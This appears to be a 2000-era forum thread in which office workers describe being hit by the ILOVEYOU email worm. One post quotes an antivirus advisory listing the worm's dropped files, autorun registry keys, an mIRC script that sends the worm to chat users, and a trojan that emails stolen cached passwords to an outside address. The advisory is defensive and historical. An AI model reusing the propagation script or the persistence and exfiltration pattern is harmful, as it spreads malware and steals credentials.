Announcement

Collapse
No announcement yet.

Aaarrgghhh Virus!

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Aaarrgghhh Virus!

    Well, here at work, we're one of the 1 in 10 UK businesses to be hit by this 'love letter' virus.

    Casualties:
    Email server.....dead.
    numerous development servers......dead.
    two test servers......dead
    one live server.....dead

    Oops!

    Oh, and I've just found out my university's email's dead too! Whoopee!

    ------------------
    Cheers,
    Steve

    "Life is what we make of it, yet most of us just fake"

  • #2
    Cool...

    could you pass it this way
    The Welsh support two teams when it comes to rugby. Wales of course, and anyone else playing England

    Comment


    • #3
      It's an email virus - if you get an email entitled 'ILOVEYOU', DO NOT open the .vbs attachment (a vbscript file). This will email everyone in your contacts list. In my company, we have had 40 people open it - at least 768 people in each person's address book. That hurts!

      ------------------
      Cheers,
      Steve

      "Life is what we make of it, yet most of us just fake"

      Comment


      • #4
        Ah, just heard that infact it also renames many many different file types' extensions to what it feels like - that's how it kills PCs. Also, it embeds itself into your registry and re-runs itself if you manage to actually keep your machine going for long enough to do a reboot.

        ------------------
        Cheers,
        Steve

        "Life is what we make of it, yet most of us just fake"

        Comment


        • #5
          Yup, I was greeted with the following message first thing this morning at work.

          A new virus, LoveLetter.A, began infecting Microsoft Outlook users' systems this morning. As far as Computer Security is aware, no SNL users have experienced the problem.
          But opening any message with an "ILOVEYOU" subject line (the message text is "kindly check the attached LOVELETTER coming from me") and then opening the attachment means your computer system will become infected -- the virus will email itself out as an attachment with the above subject line and attachment name to everyone in your Personal Address List. And THAT means overwhelming traffic in our email system.

          The bottom line: Even if you're an incurable romantic, DON'T open any message with a LoveLetter subject line! Instead, delete it immediately.

          Norton's anti-virus staffers are developing some kind of fix at the moment, but at this point our existing anti-virus systems will not prevent us from becoming infected.

          Paul
          "Never interfere with the enemy when he is in the process of destroying himself"

          Comment


          • #6
            Yup, same thing here.
            It scales up with government though.
            2000 users with at least 2000 address book entries apiece.
            Needless to say, our email server is down
            chuck


            [This message has been edited by cjolley (edited 04 May 2000).]
            Chuck
            秋音的爸爸

            Comment


            • #7
              We got hit with it too..I had 106 of them in my inbox this morning. I was fortunate enough to be smart enough not to open it. Our email is still up but reeeaaalllyyy slow!!
              Flux capacitor overclocked to 1.31 jigawatts

              Comment


              • #8
                Our admins caught it before it became a problem. No troubles here in the mid-west with it.

                Although I have recieved about 15 messages warning me about the virus...

                Jammrock

                ------------------
                Athlon 650, Biostar board, 128 MB PC133 (Crucial), G400 32 MB DH, SB Live! w/ Digital I/O, 10/100 NIC, lots of case fans, etc...
                “Inside every sane person there’s a madman struggling to get out”
                –The Light Fantastic, Terry Pratchett

                Comment


                • #9
                  Lloyds of London I just heard has fallen....

                  I wonder if the author wanted this to happen? If so, I hope he gets at least 25 years for it!

                  ----
                  Virus Name: VBS/LoveLetter.worm

                  Aliases: none known



                  Characteristics:



                  This worm is a VBS program that is sent attached to an email with the subject ILOVEYOU.

                  The mail contains the message "kindly check the attached LOVELETTER coming from me."



                  The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs



                  If the user runs the attachment the worm runs using the Windows Scripting Host program. This is not normally present on

                  Windows 95 or Windows NT unless Internet Explorer 5 is installed.



                  When the worm is first run it drops copies of itself in the following places :-



                  C:\WINDOWS\SYSTEM\MSKERNEL32.VBS

                  C:\WINDOWS\WIN32DLL.VBS

                  C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS



                  It also adds the registry keys :-



                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\ MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs

                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\ Win32DLL=C:\WINDOWS\Win32DLL.vbs



                  in order to run the worm at system start-up.





                  The worm replaces the following files :-



                  *.JPG

                  *.JPEG

                  *.MP3

                  *.MP2



                  with copies of itself and it adds the extension .VBS to the original filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would contain the worm.



                  The worm also overwrites the following files :-



                  *.VBS

                  *.VBE

                  *.JS

                  *.JSE

                  *.CSS

                  *.WSH

                  *.SCT

                  *.HTA



                  with copies of itself and renames the files to *.VBS.



                  The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and this is then sent to the IRC channels if

                  the mIRC client is installed. This is accomplished by the worm replacing the file SCRIPT.INI with the following script :-



                  [script]

                  n0=on 1:JOIN:#:{

                  n1= /if ( $nick == $me ) { halt }

                  n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM

                  n3=}



                  After a short delay the worm uses Microsoft Outlook to send copies of itself to all entries in the address book.

                  The mails will be of the same format as the original mail.





                  This worm also has another trick up it's sleeve in that it tries to download and install an executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a password stealing program that will email any cached passwords

                  to the mail address MAILME@SUPER.NET.PH



                  In order to facilitate this download the worm sets the start-up page of Microsoft Internet Explorer to point to the web-page containing the password stealing trojan.



                  The email sent by this program is as follows :-





                  From: goat1@192.168.0.2To: mailme@super.net.phSubject: Barok... email.passwords.sender.trojanX-Mailer: Barok... email.passwords.sender.trojan---by: spyderHost: goat1Username: Goat1IP Address: 192.168.0.2



                  RAS Passwords:...

                  <password information goes here>

                  ...

                  Cache Passwords:...

                  <password information goes here>

                  ...



                  goatserver.goatnet/goatserver.goatnet : GOATNET\goat1:



                  MAPI : MAPI







                  The password stealing trojan is also installed via the following registry key :-



                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFIX



                  to auto run at system start-up.



                  After it has been run the password stealing trojan copies itself to WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with



                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WinFAT32=WinFAT32.EXE







                  Date Discovered: Thursday May 4th 2000

                  DAT included: 4077

                  Risk: High
                  ----

                  ------------------
                  Cheers,
                  Steve

                  "Life is what we make of it, yet most of us just fake"

                  Comment


                  • #10
                    er... Our mail server just went down
                    The Welsh support two teams when it comes to rugby. Wales of course, and anyone else playing England

                    Comment


                    • #11
                      70% of companies and ISPs in The Netherlands have been hit by this virus.

                      I don't even dare to open Holly's emails saying she loves me j/k

                      Jord.
                      Jordâ„¢

                      Comment


                      • #12
                        I would bet my months wages that it will or has ended up here.

                        Off home!
                        The Welsh support two teams when it comes to rugby. Wales of course, and anyone else playing England

                        Comment


                        • #13
                          This is great !
                          Today, there are 67 persons in my society who love me, including the nice secretary from the first floor !

                          ------------------
                          Corwin the Brute

                          Corwin the Brute

                          Comment


                          • #14
                            Must be your eau de toilette Corwin (de



                            Jord.
                            Jordâ„¢

                            Comment


                            • #15
                              ROTFL !
                              Very nice, Jorden. I will give it a try.


                              ------------------
                              Corwin the Brute

                              Corwin the Brute

                              Comment

                              Working...
                              X